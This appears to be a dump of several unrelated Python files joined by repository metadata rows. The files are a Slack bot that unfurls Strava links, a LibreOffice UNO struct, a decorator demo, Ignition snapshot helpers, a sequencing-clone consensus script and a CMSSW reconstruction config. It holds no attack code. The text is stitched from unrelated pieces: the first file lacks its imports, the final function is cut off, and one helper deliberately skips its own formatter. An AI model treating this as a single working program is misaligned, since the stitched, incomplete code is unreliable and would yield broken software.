from slack_sdk import WebClient
from slack_sdk.errors import SlackApiError
from shared import responses
from shared import task_util
from shared.datastore.bot import Bot
from shared.datastore.service import Service
from shared.services.slack.installation_store import DatastoreInstallationStore
from shared.services.strava.client import ClientWrapper
from services.slack.track_blocks import create_track_blocks
from services.slack.unfurl_activity import unfurl_activity
from services.slack.unfurl_route import unfurl_route
from shared import ds_util
from shared.config import config
_STRAVA_APP_LINK_REGEX = re.compile('(https://www.strava.com/([^/]+)/[0-9]+)')
_TRACKS_TEAM_ID = 'T01U8EC3H8T'
_TRACKS_CHANNEL_ID = 'C020755FX3L'
_DEV_TRACKS_TEAM_ID = 'T01U4PCGSQM'
_DEV_TRACKS_CHANNEL_ID = 'C01U82F2STD'
module = flask.Blueprint('slack', __name__)
@module.route('/tasks/event', methods=['POST'])
def tasks_event():
params = task_util.get_payload(flask.request)
event = params['event']
logging.info('SlackEvent: %s', event.key)
if event['event']['type'] == 'link_shared':
return _process_link_shared(event)
return responses.OK_SUB_EVENT_UNKNOWN
@module.route('/tasks/livetrack', methods=['POST'])
def tasks_livetrack():
params = task_util.get_payload(flask.request)
track = params['track']
logging.info('process/livetrack: %s', track)
return _process_track(track)
def _process_link_shared(event):
slack_client = _create_slack_client(event)
unfurls = _create_unfurls(event)
if not unfurls:
return responses.OK_NO_UNFURLS
try:
response = slack_client.chat_unfurl(
channel=event['event']['channel'],
ts=event['event']['message_ts'],
unfurls=unfurls,
)
except SlackApiError:
logging.exception('process_link_shared: failed: unfurling: %s', unfurls)
return responses.INTERNAL_SERVER_ERROR
if not response['ok']:
logging.error('process_link_shared: failed: %s with %s', response, unfurls)
return responses.INTERNAL_SERVER_ERROR
logging.debug('process_link_shared: %s', response)
return responses.OK
def _create_slack_client(event):
slack_service = Service.get('slack', parent=Bot.key())
installation_store = DatastoreInstallationStore(
ds_util.client, parent=slack_service.key
)
slack_bot = installation_store.find_bot(
enterprise_id=event.get('authorizations', [{}])[0].get('enterprise_id'),
team_id=event.get('authorizations', [{}])[0].get('team_id'),
is_enterprise_install=event.get('authorizations', [{}])[0].get(
'is_enterprise_install'
),
)
return WebClient(slack_bot.bot_token)
def _create_slack_client_for_team(team_id):
slack_service = Service.get('slack', parent=Bot.key())
installation_store = DatastoreInstallationStore(
ds_util.client, parent=slack_service.key
)
slack_bot = installation_store.find_bot(
enterprise_id=None,
team_id=team_id,
is_enterprise_install=False,
)
return WebClient(slack_bot.bot_token)
def _create_unfurls(event):
strava = Service.get('strava', parent=Bot.key())
strava_client = ClientWrapper(strava)
unfurls = {}
for link in event['event']['links']:
alt_url = _resolve_rewrite_link(link)
unfurl = _unfurl(strava_client, link, alt_url)
if unfurl:
unfurls[link['url']] = unfurl
logging.warning(f'_create_unfurls: {unfurls}')
return unfurls
def _resolve_rewrite_link(link):
if 'strava.app.link' not in link['url']:
return
try:
logging.info('_resolve_rewrite_link: fetching: %s', link['url'])
with urllib.request.urlopen(link['url']) as response:
contents = response.read()
logging.debug('_resolve_rewrite_link: fetched: %s', link['url'])
except urllib.request.HTTPError:
logging.exception('Could not fetch %s', link['url'])
return
match = _STRAVA_APP_LINK_REGEX.search(str(contents))
if match is None:
logging.warning('Could not resolve %s', link['url'])
return
resolved_url = match.group()
return resolved_url
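# For illustration, a strava.app.link share URL typically resolves to something
# like 'https://www.strava.com/activities/1234567890' (the id here is made up),
# which _unfurl below can then dispatch on.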
def _unfurl(strava_client, link, alt_url=None):
url = alt_url if alt_url else link['url']
if '/routes/' in url:
return unfurl_route(strava_client, url)
elif '/activities/' in url:
return unfurl_activity(strava_client, url)
else:
return None
def _process_track(track: Entity) -> responses.Response:
if config.is_dev:
team_id = _DEV_TRACKS_TEAM_ID
channel_id = _DEV_TRACKS_CHANNEL_ID
else:
team_id = _TRACKS_TEAM_ID
channel_id = _TRACKS_CHANNEL_ID
slack_client = _create_slack_client_for_team(team_id)
blocks = create_track_blocks(track)
if not blocks:
return responses.OK_INVALID_LIVETRACK
try:
response = slack_client.chat_postMessage(
channel=channel_id, blocks=blocks, unfurl_links=False, unfurl_media=False
)
except SlackApiError:
logging.exception(f'process_track: failed: track: {track}, blocks: {blocks}')
return responses.INTERNAL_SERVER_ERROR
if not response['ok']:
logging.error(
f'process_track: failed: response: {response}, track: {track}, blocks: {blocks}'
)
return responses.INTERNAL_SERVER_ERROR
logging.debug('process_track: %s', response)
return responses.OK
| 32.846561 | 92 | 0.704897 | 0 | 0 | 0 | 0 | 557 | 0.089723 | 0 | 0 | 1,451 | 0.233731 |
1fc244ac9c29079630ffd294e5609b1a6c46e1ff
| 3,895 |
py
|
Python
|
ooobuild/lo/drawing/framework/tab_bar_button.py
|
Amourspirit/ooo_uno_tmpl
|
64e0c86fd68f24794acc22d63d8d32ae05dd12b8
|
[
"Apache-2.0"
] | null | null | null |
ooobuild/lo/drawing/framework/tab_bar_button.py
|
Amourspirit/ooo_uno_tmpl
|
64e0c86fd68f24794acc22d63d8d32ae05dd12b8
|
[
"Apache-2.0"
] | null | null | null |
ooobuild/lo/drawing/framework/tab_bar_button.py
|
Amourspirit/ooo_uno_tmpl
|
64e0c86fd68f24794acc22d63d8d32ae05dd12b8
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
#
# Copyright 2022 :Barry-Thomas-Paul: Moss
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Struct Class
# this is an auto-generated file produced by Cheetah
# Namespace: com.sun.star.drawing.framework
# Libre Office Version: 7.3
from ooo.oenv.env_const import UNO_NONE
import typing
from .x_resource_id import XResourceId as XResourceId_5be3103d
class TabBarButton(object):
"""
Struct Class
Descriptor of a tab bar button.
Tab bar buttons are typically used to offer the user the choice between different views to be displayed in one pane.
For identification only the ResourceId is used, so for some methods of the XTabBar interface only the ResourceId member is evaluated.
See Also:
`API TabBarButton <https://api.libreoffice.org/docs/idl/ref/structcom_1_1sun_1_1star_1_1drawing_1_1framework_1_1TabBarButton.html>`_
"""
__ooo_ns__: str = 'com.sun.star.drawing.framework'
__ooo_full_ns__: str = 'com.sun.star.drawing.framework.TabBarButton'
__ooo_type_name__: str = 'struct'
typeName: str = 'com.sun.star.drawing.framework.TabBarButton'
"""Literal Constant ``com.sun.star.drawing.framework.TabBarButton``"""
def __init__(self, ButtonLabel: typing.Optional[str] = '', HelpText: typing.Optional[str] = '', ResourceId: typing.Optional[XResourceId_5be3103d] = None) -> None:
"""
Constructor
Arguments:
ButtonLabel (str, optional): ButtonLabel value.
HelpText (str, optional): HelpText value.
ResourceId (XResourceId, optional): ResourceId value.
"""
super().__init__()
if isinstance(ButtonLabel, TabBarButton):
oth: TabBarButton = ButtonLabel
self.ButtonLabel = oth.ButtonLabel
self.HelpText = oth.HelpText
self.ResourceId = oth.ResourceId
return
kargs = {
"ButtonLabel": ButtonLabel,
"HelpText": HelpText,
"ResourceId": ResourceId,
}
self._init(**kargs)
def _init(self, **kwargs) -> None:
self._button_label = kwargs["ButtonLabel"]
self._help_text = kwargs["HelpText"]
self._resource_id = kwargs["ResourceId"]
@property
def ButtonLabel(self) -> str:
"""
This label is displayed on the UI as button text.
The label is expected to be localized.
"""
return self._button_label
@ButtonLabel.setter
def ButtonLabel(self, value: str) -> None:
self._button_label = value
@property
def HelpText(self) -> str:
"""
The localized help text that may be displayed in a tool tip.
"""
return self._help_text
@HelpText.setter
def HelpText(self, value: str) -> None:
self._help_text = value
@property
def ResourceId(self) -> XResourceId_5be3103d:
"""
XResourceId object of the resource that is requested to be displayed when the tab bar button is activated.
For some methods of the XTabBar interface only this member is evaluated. That is because only this member is used to identify a tab bar button.
"""
return self._resource_id
@ResourceId.setter
def ResourceId(self, value: XResourceId_5be3103d) -> None:
self._resource_id = value
__all__ = ['TabBarButton']
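# Minimal construction sketch (illustrative only; a real XResourceId instance
# would come from the drawing framework at runtime):
#
#     button = TabBarButton(ButtonLabel='Outline', HelpText='Switch to outline view')
#     button.ResourceId = resource_id  # hypothetical XResourceId value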
| 33.869565 | 166 | 0.668293 | 2,997 | 0.769448 | 0 | 0 | 1,079 | 0.277022 | 0 | 0 | 2,246 | 0.576637 |
1fc419f20f21c00b2f7e26ead5cc3549a10d6b37
| 662 |
py
|
Python
|
decorator/mark_with_args.py
|
levs72/pyneng-examples
|
d6288292dcf9d1ebc5a9db4a0d620bd11b4a2df9
|
[
"MIT"
] | 11 |
2021-04-05T09:30:23.000Z
|
2022-03-09T13:27:56.000Z
|
decorator/mark_with_args.py
|
levs72/pyneng-examples
|
d6288292dcf9d1ebc5a9db4a0d620bd11b4a2df9
|
[
"MIT"
] | null | null | null |
decorator/mark_with_args.py
|
levs72/pyneng-examples
|
d6288292dcf9d1ebc5a9db4a0d620bd11b4a2df9
|
[
"MIT"
] | 11 |
2021-04-06T03:44:35.000Z
|
2022-03-04T21:20:40.000Z
|
def mark(**kwargs):
print(f"Получил аргументы {kwargs}")
def decorator(func):
print(f"добавляем атрибуты функции {kwargs}")
for name, value in kwargs.items():
setattr(func, name, value)
return func
decorator.data = kwargs
return decorator
def mark_2(**kwargs_mark):
print(f"Получил аргументы {kwargs_mark}")
def decorator(func):
def inner(*args, **kwargs):
return func(*args, **kwargs)
print(f"добавляем атрибуты функции {kwargs_mark}")
for name, value in kwargs_mark.items():
setattr(inner, name, value)
return inner
return decorator
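# Usage sketch (illustrative only): both decorators attach the given keyword
# arguments as attributes of the decorated function.
#
#     @mark(author="me", version=1)
#     def func():
#         pass
#
#     func.author   # -> "me"
#     func.version  # -> 1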
| 24.518519 | 58 | 0.614804 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 224 | 0.301887 |
1fc41c98a94f4ecb65c5c9b1a3aac7dc614e2662
| 5,087 |
py
|
Python
|
shared/tools/snapshot/utils.py
|
DougMahoney/metatools
|
112340102962ff0c3e323564357cc4e848939cf7
|
[
"Apache-2.0"
] | 12 |
2020-04-10T07:09:24.000Z
|
2022-03-04T09:22:40.000Z
|
shared/tools/snapshot/utils.py
|
DougMahoney/metatools
|
112340102962ff0c3e323564357cc4e848939cf7
|
[
"Apache-2.0"
] | 5 |
2020-05-16T18:22:23.000Z
|
2022-03-29T13:19:27.000Z
|
shared/tools/snapshot/utils.py
|
DougMahoney/metatools
|
112340102962ff0c3e323564357cc4e848939cf7
|
[
"Apache-2.0"
] | 2 |
2020-12-10T15:17:40.000Z
|
2021-12-02T17:34:56.000Z
|
"""
Extraction utilities and supporting functions
Some operations are used frequently or repeated enough to be factored out.
Note that SQL can be used via the POORSQL_BINARY_PATH
Download the binary from http://architectshack.com/PoorMansTSqlFormatter.ashx
It's a phenomenal utility that brilliantly normalizes SQL code.
Have friends/coworkers/peers who missed an indent? This will prevent
a diff utility from tripping up on that.
"""
from shared.tools.yaml.core import dump
from java.util import Date
# Taken from the Metatools library, copied here for convenience
def getDesignerContext(anchor=None):
"""Attempts to grab the Ignition designer context.
This is most easily done with a Vision object, like a window.
If no object is provided as a starting point, it will attempt to
get one from the designer context.
"""
from com.inductiveautomation.ignition.designer import IgnitionDesigner
if anchor is None:
try:
return IgnitionDesigner.getFrame().getContext()
except:
for windowName in system.gui.getWindowNames():
try:
anchor = system.gui.getWindow(windowName)
break
except:
pass
else:
raise LookupError("No open windows were found, so no context was derived by default.")
try:
anchor = anchor.source
except AttributeError:
pass
# Just making sure we've a live object in the tree, not just an event object
for i in range(50):
if anchor.parent is None:
break
else:
anchor = anchor.parent
if isinstance(anchor,IgnitionDesigner):
break
else:
raise RuntimeError("No Designer Context found in this object's heirarchy")
context = anchor.getContext()
return context
POORSQL_BINARY_PATH = 'C:/Workspace/bin/SqlFormatter.exe'
# from https://stackoverflow.com/a/165662/13229100
from subprocess import Popen, PIPE, STDOUT
def format_sql(raw_sql):
"""Normalize the SQL so it is consistent for diffing"""
try:
		# NOTE: this deliberately short-circuits to the bare except below, so the
		# external formatter is skipped and the raw SQL is returned unchanged.
		raise KeyboardInterrupt
poorsql = Popen(
[POORSQL_BINARY_PATH,
], stdout=PIPE, stdin=PIPE, stderr=STDOUT)
formatted = poorsql.communicate(input=raw_sql)[0]
return formatted.replace('\r\n', '\n').strip()
except:
return raw_sql
import java.awt.Point, java.awt.Dimension, java.util.UUID
BASE_TYPES = set([bool, float, int, long, None, str, unicode])
COERSION_MAP = {
java.awt.Point: lambda v: {'x': v.getX(), 'y': v.getY()},
java.awt.Dimension: lambda v: {'width': v.getWidth(), 'height': v.getHeight()},
java.util.UUID: lambda v: str(v),
}
def coerceValue(value, default=str):
if type(value) in BASE_TYPES:
return value
else:
return COERSION_MAP.get(type(value), default)(value)
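# For illustration: coerceValue(java.awt.Point(3, 4)) -> {'x': 3.0, 'y': 4.0};
# unmapped non-base types fall back to the `default` callable (str).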
#ptd = propsetToDict = lambda ps: dict([(p.getName(), ps.get(p)) for p in ps.getProperties()])
def propsetToDict(property_set, recurse=False, coersion=coerceValue, visited=None):
if visited is None:
visited = set()
elif property_set in visited:
return None
result_dict = {}
for prop in property_set.getProperties():
value = property_set.get(prop)
if recurse and not type(value) in BASE_TYPES:
try:
deep = propsetToDict(value, recurse, coersion, visited)
except:
try:
deep = []
for element in value:
try:
deep.append(propsetToDict(element, recurse, coersion, visited))
except:
deep.append(coersion(element))
except:
deep = None
if deep:
value = deep
else:
value = coersion(value)
else:
value = coersion(value)
result_dict[prop.getName()] = value
return result_dict
def hashmapToDict(hashmap):
return dict(
(key, hashmap.get(key))
for key in hashmap.keySet()
)
def serializeToXML(obj, context=None):
if context is None:
context = getDesignerContext()
serializer = context.createSerializer()
serializer.addObject(obj)
return serializer.serializeXML()
def stringify(obj):
if isinstance(obj, (str, unicode)):
return str(obj).replace('\r\n', '\n')
elif isinstance(obj, (list, tuple)):
return [stringify(item) for item in obj]
elif isinstance(obj, dict):
return dict((str(key),stringify(value))
for key, value
in obj.items())
elif isinstance(obj, Date):
return str(obj.toInstant()) # get the ISO8601 format
# coerce java and other objects
elif not isinstance(obj, (int, float, bool)):
return repr(obj)
return obj
def yamlEncode(obj):
return dump(stringify(obj), sort_keys=True, indent=4)
def encode(obj):
"""
Encodes object in a serializing format.
Returns tuple of serialization format's file extention and the serialized data.
"""
return '.yaml', yamlEncode(obj),
# return '.json', system.util.jsonEncode(obj, 2),
from com.inductiveautomation.ignition.common.xmlserialization import SerializationException
def getSerializationCauses(exception):
"""Many objects may not be able to deserialize if imported from an
Ignition instance with additional (but locally missing) modules.
This will drag out some of the context in an easier to scan way.
"""
causes = []
while exception:
causes.append(exception)
exception = exception.getCause()
return causes
| 25.691919 | 94 | 0.716139 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,660 | 0.326322 |
1fc6fa21c4051a53146d8cf76b830b672309eed5
| 12,203 |
py
|
Python
|
HTGTSrep/HTGTSrep/junctionsPerLibs.py
|
Yyx2626/HTGTSrep
|
d8716304b555a7b9161e5f2ce988ebfd17abc9f0
|
[
"MIT"
] | 2 |
2020-05-08T05:12:37.000Z
|
2022-03-28T02:53:03.000Z
|
HTGTSrep/HTGTSrep/junctionsPerLibs.py
|
Yyx2626/HTGTSrep
|
d8716304b555a7b9161e5f2ce988ebfd17abc9f0
|
[
"MIT"
] | 1 |
2020-03-05T04:08:39.000Z
|
2021-08-11T15:02:37.000Z
|
HTGTSrep/HTGTSrep/junctionsPerLibs.py
|
Yyx2626/HTGTSrep
|
d8716304b555a7b9161e5f2ce988ebfd17abc9f0
|
[
"MIT"
] | 4 |
2020-05-30T12:45:48.000Z
|
2022-03-31T12:24:53.000Z
|
'''import sys
import operator
from Bio.Seq import Seq
try:
from Bio.Alphabet import generic_dna, IUPAC
Bio_Alphabet = True
except ImportError:
Bio_Alphabet = None
# usages of generic_dna, IUPAC are not supported in Biopython 1.78 (September 2020).
print(f"The installed BioPython is a new version that has removed the Alphabet module.",file=sys.stderr)
def filter(statFile):
# statfile = '%s/allsample_clonal/allsample.mix_clone.stat.xls' % (args.outdir)
ListOfLines = []
labels = statFile.readline()
litems = labels[:-1].split("\t")
ListOfLines.append(litems)
for line in statFile:
items = line[:-1].split("\t")
ListOfLines.append(items)
return ListOfLines
def consensus(lines, CDR3_AA):
consensusLines = []
lines[0].append("CONSENSUS_SEQ")
jidx = lines[0].index("JUNC_DETAIL")
consensusLines.append(lines[0])
for line in lines[1:]:
# h = 1
# cdr = ''
juncDets = line[jidx]
# commented out useless lines JH 06032021
# for item in juncDets.split('|'):
# i1 = item.split(':')[0]
# i2 = int(item.split(':')[1])
# if i2 > h:
# h = i2
# cdr = i1
if CDR3_AA != "T":
consensus = get_consensus(juncDets)
else:
consensus = get_consensus_AA(juncDets)
line.append(consensus)
consensusLines.append(line)
return consensusLines
def get_consensus_AA(allCDR):
pos_base_num = {}
cdr3_len = len(allCDR.split('|')[0].split(':')[0])
for i in range(0, cdr3_len):
pos_base_num[i] = {"A": 0, "R": 0, "N": 0, "D": 0, "C": 0, "Q": 0, "E": 0, "G": 0, "H": 0, "I": 0, "L": 0, "K": 0, "M": 0, "F": 0, "P": 0, "S": 0, "T": 0, "W": 0, "Y": 0, "V": 0}
for seg in allCDR.split('|'):
j = seg.split(':')
for i in range(0, cdr3_len):
pos_base_num[i][j[0][i]] += int(j[1])
consensus = ''
for i in range(0, cdr3_len):
consensus += max(pos_base_num[i].items(), key=operator.itemgetter(1))[0]
return consensus
def get_consensus(allCDR):
pos_base_num = {}
cdr3_len = len(allCDR.split('|')[0].split(':')[0])
for i in range(0, cdr3_len):
pos_base_num[i] = {'A':0, 'T':0, 'C':0, 'G':0, "N":0}
for seg in allCDR.split('|'):
j = seg.split(':')
for i in range(0, cdr3_len):
pos_base_num[i][j[0][i]] += int(j[1])
consensus = ''
for i in range(0, cdr3_len):
consensus += max(pos_base_num[i].items(), key=operator.itemgetter(1))[0]
return consensus
def translate(listLines, CDR3_AA):
dnas = []
listLines[0].append("AA_SEQUENCE")
dnas.append(listLines[0])
conSeq = listLines[0].index("CONSENSUS_SEQ")
# i=0
if CDR3_AA != "T":
for line in listLines[1:]:
seq = line[conSeq]
while len(seq)%3 != 0:
seq += "N"
if Bio_Alphabet:
AA = Seq(seq, generic_dna).translate()
else:
AA = Seq(seq).translate()
# i+=1
line.append(str(AA))
dnas.append(line)
else:
for line in listLines[1:]:
seq = line[conSeq]
AA = seq
# i+=1
line.append(str(AA))
dnas.append(line)
return dnas
def main():
# statfile = '%s/allsample_clonal/allsample.mix_clone.stat.xls' % (args.outdir)
clonestat = open(sys.argv[1], "r")
CDR3_AA = sys.argv[2]
toParse = filter(clonestat)
toTranslate = consensus(toParse,CDR3_AA)
translated = translate(toTranslate,CDR3_AA) #already translated allsample.stat file, a list of lines in a file
libsfile = sys.argv[3:] #read in each library's clonestat file to create lib_detail
# # useless lines JH 06032021
# c=0
# libscloneDict = {} ##lib, clone: cdr3seq, num
# cdr3dict = {} ###seq, num : lib, clone
listOfSingleLibraryDicts = []
for library in libsfile:
libstatfile = open(library, "r")
libDict = {} ##append junction details to the library dictionary, for each clone (cdr3seq,V-allele, J-allele): sample, readnum
labels = libstatfile.readline()[:-1].split("\t")
juncIdx = labels.index("JUNC_DETAIL")
vidx = labels.index("V_ALLELE")
jidx = labels.index("J_ALLELE")
sIdx = labels.index("SAMPLE_DETAIL")
for line in libstatfile: #iterate through all the clones in a single library
items = line[:-1].split("\t")
v_allele = items[vidx]
j_allele = items[jidx]
juncDetails = items[juncIdx].split("|")
sample = items[sIdx]
for j in juncDetails:
seqSpecs = j.split(":")
cdr3seq = seqSpecs[0]
readNum = seqSpecs[1]
if (cdr3seq, v_allele, j_allele) not in libDict:
libDict[(cdr3seq, v_allele, j_allele)] = (sample, readNum)
#else:
# print(cdr3seq, readNum)
listOfSingleLibraryDicts.append(libDict)
# print(listOfSingleLibraryDicts)
translated[0].append("LIB_DETAIL") # will contain all lines of master clone file
labels = translated[0] # clonestat.readline()[:-1].split("\t")
idxJD = labels.index("JUNC_DETAIL")
# idxClone = labels.index("CLONE")
idxV = labels.index("V_ALLELE")
idxJ = labels.index("J_ALLELE")
for line in translated[1:2]: #clonestat:
v_allele = line[idxV]
j_allele = line[idxJ]
juncDetails = line[idxJD].split("|")
libDetailString = ''
for j in juncDetails:
seqSpecs = j.split(":")
cdr3seqJ = seqSpecs[0]
# readNum = seqSpecs[1]
tuple2check = (cdr3seqJ, v_allele, j_allele)
print(tuple2check,seqSpecs)
for dict in listOfSingleLibraryDicts:
if tuple2check in dict:
libDetailString += dict[tuple2check][0] + ":" + cdr3seqJ + ":" + dict[tuple2check][1] + "|"
print(libDetailString)
if libDetailString[-1] == "|":
line.append(libDetailString[:-1])
else:
line.append(libDetailString)
for i in translated:
print("\t".join(i))
main()
'''
import sys
import operator
from Bio.Seq import Seq
try:
from Bio.Alphabet import generic_dna, IUPAC
Bio_Alphabet = True
except ImportError:
Bio_Alphabet = None
# usages of generic_dna, IUPAC are not supported in Biopython 1.78 (September 2020).
print(f"The installed BioPython is a new version that has removed the Alphabet module.",file=sys.stderr)
def filter(statFile):
# statfile = '%s/allsample_clonal/allsample.mix_clone.stat.xls' % (args.outdir)
ListOfLines = []
labels = statFile.readline()
# updated to .replace so that the last character of the last line will not be accidentally deleted JH 06042021
# litems = labels[:-1].split("\t")
litems = labels.replace("\n", "").split("\t")
ListOfLines.append(litems)
for line in statFile:
# updated to .replace so that the last character of the last line will not be accidentally deleted JH 06042021
# items = line[:-1].split("\t")
items = line.replace("\n", "").split("\t")
ListOfLines.append(items)
return ListOfLines
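# For each clone row, derive a consensus CDR3 sequence from its JUNC_DETAIL column and append it as CONSENSUS_SEQ.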
def consensus(lines):
consensusLines = []
lines[0].append("CONSENSUS_SEQ")
jidx = lines[0].index("JUNC_DETAIL")
consensusLines.append(lines[0])
for line in lines[1:]:
# h = 1
# cdr = ''
juncDets = line[jidx]
# commented out useless lines JH 06032021
# for item in juncDets.split('|'):
# i1 = item.split(':')[0]
# i2 = int(item.split(':')[1])
# if i2 > h:
# h = i2
# cdr = i1
consensus = get_consensus(juncDets)
line.append(consensus)
consensusLines.append(line)
return consensusLines
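# Per-position weighted majority vote over "SEQ:count|SEQ:count" junction entries.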
def get_consensus(allCDR):
pos_base_num = {}
cdr3_len = len(allCDR.split('|')[0].split(':')[0])
for i in range(0, cdr3_len):
pos_base_num[i] = {'A':0, 'T':0, 'C':0, 'G':0, "N":0}
for seg in allCDR.split('|'):
j = seg.split(':')
for i in range(0, cdr3_len):
pos_base_num[i][j[0][i]] += int(j[1])
consensus = ''
for i in range(0, cdr3_len):
consensus += max(pos_base_num[i].items(), key=operator.itemgetter(1))[0]
return consensus
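# Translate each consensus CDR3 nucleotide sequence to amino acids, padding with N to a multiple of three.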
def translate(listLines):
dnas = []
listLines[0].append("AA_SEQUENCE")
dnas.append(listLines[0])
conSeq = listLines[0].index("CONSENSUS_SEQ")
# i=0
for line in listLines[1:]:
seq = line[conSeq]
while len(seq) % 3 != 0:
seq += "N"
if Bio_Alphabet:
AA = Seq(seq, generic_dna).translate()
else:
AA = Seq(seq).translate()
# i+=1
line.append(str(AA))
dnas.append(line)
return dnas
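# Usage: junctionsPerLibs.py <allsample clone stat file> <per-library clone stat files...>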
def main():
# NOTE statfile = '%s/allsample_clonal/allsample.mix_clone.stat.xls' % (args.outdir)
clonestat = open(sys.argv[1], "r")
toParse = filter(clonestat)
toTranslate = consensus(toParse)
translated = translate(toTranslate) #already translated allsample.stat file, a list of lines in a file
libsfile = sys.argv[2:] # read in each library's clonestat file to create lib_detail
# # useless lines JH 06032021
# c=0
# libscloneDict = {} ##lib, clone: cdr3seq, num
# cdr3dict = {} ###seq, num : lib, clone
listOfSingleLibraryDicts = []
for library in libsfile:
libstatfile = open(library, "r")
libDict = {} ##append junction details to the library dictionary, for each clone (cdr3seq,V-allele, J-allele): sample, readnum
# updated to .replace so that the last character of the last line will not be accidentally deleted JH 06042021
# labels = libstatfile.readline()[:-1].split("\t")
labels = libstatfile.readline().replace("\n", "").split("\t")
juncIdx = labels.index("JUNC_DETAIL")
vidx = labels.index("V_ALLELE")
jidx = labels.index("J_ALLELE")
sIdx = labels.index("SAMPLE_DETAIL")
for line in libstatfile: #iterate through all the clones in a single library
# updated to .replace so that the last character of the last line will not be accidentally deleted JH 06042021
# items = line[:-1].split("\t")
items = line.replace("\n", "").split("\t")
v_allele = items[vidx]
j_allele = items[jidx]
juncDetails = items[juncIdx].split("|")
sample = items[sIdx]
for j in juncDetails:
seqSpecs = j.split(":")
cdr3seq = seqSpecs[0]
readNum = seqSpecs[1]
if (cdr3seq, v_allele, j_allele) not in libDict:
libDict[(cdr3seq, v_allele, j_allele)] = (sample, readNum)
#else:
# print(cdr3seq, readNum)
listOfSingleLibraryDicts.append(libDict)
# print(listOfSingleLibraryDicts)
translated[0].append("LIB_DETAIL") # will contain all lines of master clone file
labels = translated[0] # clonestat.readline()[:-1].split("\t")
idxJD = labels.index("JUNC_DETAIL")
# idxClone = labels.index("CLONE")
idxV = labels.index("V_ALLELE")
idxJ = labels.index("J_ALLELE")
for line in translated[1:]: #clonestat:
v_allele = line[idxV]
j_allele = line[idxJ]
juncDetails = line[idxJD].split("|")
libDetailString = ''
for j in juncDetails:
seqSpecs = j.split(":")
cdr3seqJ = seqSpecs[0]
# readNum = seqSpecs[1]
tuple2check = (cdr3seqJ, v_allele, j_allele)
for dict in listOfSingleLibraryDicts:
if tuple2check in dict:
libDetailString += dict[tuple2check][0] + ":" + cdr3seqJ + ":" + dict[tuple2check][1] + "|"
if libDetailString[-1] == "|":
line.append(libDetailString[:-1])
else:
line.append(libDetailString)
for i in translated:
print("\t".join(i))
main()
| 35.891176 | 186 | 0.578137 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8,313 | 0.681226 |
1fc8f64a1c48e617dc27ddaba536434b9f8ea44b
| 4,915 |
py
|
Python
|
Configuration/GlobalRuns/python/reco_TLR_311X.py
|
ckamtsikis/cmssw
|
ea19fe642bb7537cbf58451dcf73aa5fd1b66250
|
[
"Apache-2.0"
] | 852 |
2015-01-11T21:03:51.000Z
|
2022-03-25T21:14:00.000Z
|
Configuration/GlobalRuns/python/reco_TLR_311X.py
|
ckamtsikis/cmssw
|
ea19fe642bb7537cbf58451dcf73aa5fd1b66250
|
[
"Apache-2.0"
] | 30,371 |
2015-01-02T00:14:40.000Z
|
2022-03-31T23:26:05.000Z
|
Configuration/GlobalRuns/python/reco_TLR_311X.py
|
ckamtsikis/cmssw
|
ea19fe642bb7537cbf58451dcf73aa5fd1b66250
|
[
"Apache-2.0"
] | 3,240 |
2015-01-02T05:53:18.000Z
|
2022-03-31T17:24:21.000Z
|
import FWCore.ParameterSet.Config as cms
def customiseCommon(process):
#####################################################################################################
####
#### Top level replaces for handling strange scenarios of early collisions
####
## TRACKING:
process.newSeedFromTriplets.OrderedHitsFactoryPSet.GeneratorPSet.maxElement = cms.uint32(100000)
process.newSeedFromPairs.OrderedHitsFactoryPSet.maxElement = cms.uint32(100000)
process.secTriplets.OrderedHitsFactoryPSet.GeneratorPSet.maxElement = cms.uint32(100000)
process.thTripletsA.OrderedHitsFactoryPSet.GeneratorPSet.maxElement = cms.uint32(100000)
process.thTripletsB.OrderedHitsFactoryPSet.GeneratorPSet.maxElement = cms.uint32(100000)
process.fourthPLSeeds.OrderedHitsFactoryPSet.maxElement = cms.uint32(100000)
process.fifthSeeds.OrderedHitsFactoryPSet.maxElement = cms.uint32(100000)
###### FIXES TRIPLETS FOR LARGE BS DISPLACEMENT ######
### prevent bias in pixel vertex
process.pixelVertices.useBeamConstraint = False
###
### end of top level replacements
###
###############################################################################################
return (process)
##############################################################################
def customisePPData(process):
process= customiseCommon(process)
## particle flow HF cleaning
process.particleFlowRecHitHCAL.LongShortFibre_Cut = 30.
process.particleFlowRecHitHCAL.ApplyPulseDPG = True
## HF cleaning for data only
process.hcalRecAlgos.SeverityLevels[3].RecHitFlags.remove("HFDigiTime")
process.hcalRecAlgos.SeverityLevels[4].RecHitFlags.append("HFDigiTime")
##beam-halo-id for data only
process.CSCHaloData.ExpectedBX = cms.int32(3)
## hcal hit flagging
process.hfreco.PETstat.flagsToSkip = 2
process.hfreco.S8S1stat.flagsToSkip = 18
process.hfreco.S9S1stat.flagsToSkip = 26
return process
##############################################################################
def customisePPMC(process):
process=customiseCommon(process)
return process
##############################################################################
def customiseCosmicData(process):
return process
##############################################################################
def customiseCosmicMC(process):
return process
##############################################################################
def customiseVALSKIM(process):
process= customisePPData(process)
process.reconstruction.remove(process.lumiProducer)
return process
##############################################################################
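# Express reconstruction additionally swaps in the online beam spot producer.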
def customiseExpress(process):
process= customisePPData(process)
import RecoVertex.BeamSpotProducer.BeamSpotOnline_cfi
process.offlineBeamSpot = RecoVertex.BeamSpotProducer.BeamSpotOnline_cfi.onlineBeamSpotProducer.clone()
return process
##############################################################################
def customisePrompt(process):
process= customisePPData(process)
return process
##############################################################################
##############################################################################
def customiseCommonHI(process):
###############################################################################################
####
#### Top level replaces for handling strange scenarios of early HI collisions
####
## Offline Silicon Tracker Zero Suppression
process.siStripZeroSuppression.Algorithms.CommonModeNoiseSubtractionMode = cms.string("IteratedMedian")
process.siStripZeroSuppression.Algorithms.CutToAvoidSignal = cms.double(2.0)
process.siStripZeroSuppression.Algorithms.Iterations = cms.int32(3)
process.siStripZeroSuppression.storeCM = cms.bool(True)
###
### end of top level replacements
###
###############################################################################################
return process
##############################################################################
def customiseExpressHI(process):
process= customiseCommonHI(process)
